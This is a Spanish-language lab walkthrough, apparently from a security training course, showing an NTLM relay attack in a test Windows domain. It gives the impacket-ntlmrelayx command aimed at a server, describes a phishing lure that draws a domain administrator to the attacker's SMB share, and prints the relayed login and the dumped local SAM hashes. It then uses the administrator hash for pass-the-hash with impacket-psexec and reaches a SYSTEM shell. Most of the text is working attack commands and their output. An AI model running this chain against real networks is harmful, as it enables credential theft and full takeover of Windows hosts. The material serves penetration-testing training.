Utilizando impacket-ntlmrelayx
OBJETIVO DEL EJERCICIO #14:
Utilizaimpacket-ntlmrelayx
para exponer servicios maliciosos con el objetivo de capturar los hashes de WebServer
.
Para realizarlo es suficiente tener encendido UNICAMENTE WEBSERVER
y First-DC
.
impacket-ntlmrelayx
es una herramienta del conjunto de herramientas Impacket, desarrollada por Fortra (anteriormente conocida como SecureAuth). Esta herramienta se utiliza para realizar ataques de retransmisión NTLM, una técnica que aprovecha la forma en que el protocolo NTLM (NT LAN Manager) maneja la autenticación en redes Windows
Para este ataque es necesario tener un VPC con IP Publica y desde alli configurar el responder.
┌──(root㉿kali)-[/home/kali]
└─# ip a show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
link/ether 02:01:36:bf:4e:ab brd ff:ff:ff:ff:ff:ff
inet 10.0.1.174/24 brd 10.0.1.255 scope global dynamic eth0
valid_lft 3498sec preferred_lft 3498sec
inet6 fe80::1:36ff:febf:4eab/64 scope link
valid_lft forever preferred_lft forever
┌──(root㉿kali)-[/home/kali]
└─# impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Para este escenario estaremos apuntando hacia la IP 10.0.1.249 que corresponde a WebServer.
Y ahora desde RDP en el servidor First-DC con la IP 10.0.1.100 vamos a simular que somos la victima.

En la evidencia previa, se puede apreciar un phising que trata de seducir al administrador de dominio a revisar el SMB de la IP del atacante: 10.0.1.174
Si la victima accediendo al recurso compartido malicioso, le saldra esto:

Y en nuestro impacket-ntlmrelayx, vamos a obtener lo siguiente:
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.0.1.100, attacking target smb://10.0.1.249
[*] Authenticating against smb://10.0.1.249 as SPARTANCYBERSEC/ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xea7b3f466f263386e6dc165bcde0d1d2
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
prueba:1005:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
gerh:1006:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
demo:1010:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
Jorl:1011:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Done dumping SAM hashes for host: 10.0.1.249
[*] Stopping service RemoteRegistry
Te envitamos a leer la explicacion de este ataque de una manera mas detallada: Análisis de impacket-ntlmrelayx
En este punto podrias realizar una tecnica llamada pass the hash sobre la maquina 10.0.1.249 utilizando el hash de:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::
Te recomendamos la lectura de Pass-the-Hash (PtH)
┌──(root㉿kali)-[/home/kali]
└─# impacket-psexec -hashes :f47f6266f4bb428db65cd949e7537f52 [email protected]
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.0.1.249.....
[*] Found writable share ADMIN$
[*] Uploading file iHpDtPof.exe
[*] Opening SVCManager on 10.0.1.249.....
[*] Creating service yVzM on 10.0.1.249.....
[*] Starting service yVzM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
WebServer
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . : spartancybersec.corp
Link-local IPv6 Address . . . . . : fe80::3dce:ac79:a1b0:7820%7
IPv4 Address. . . . . . . . . . . : 10.0.1.249
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.1.1
Última actualización
¿Te fue útil?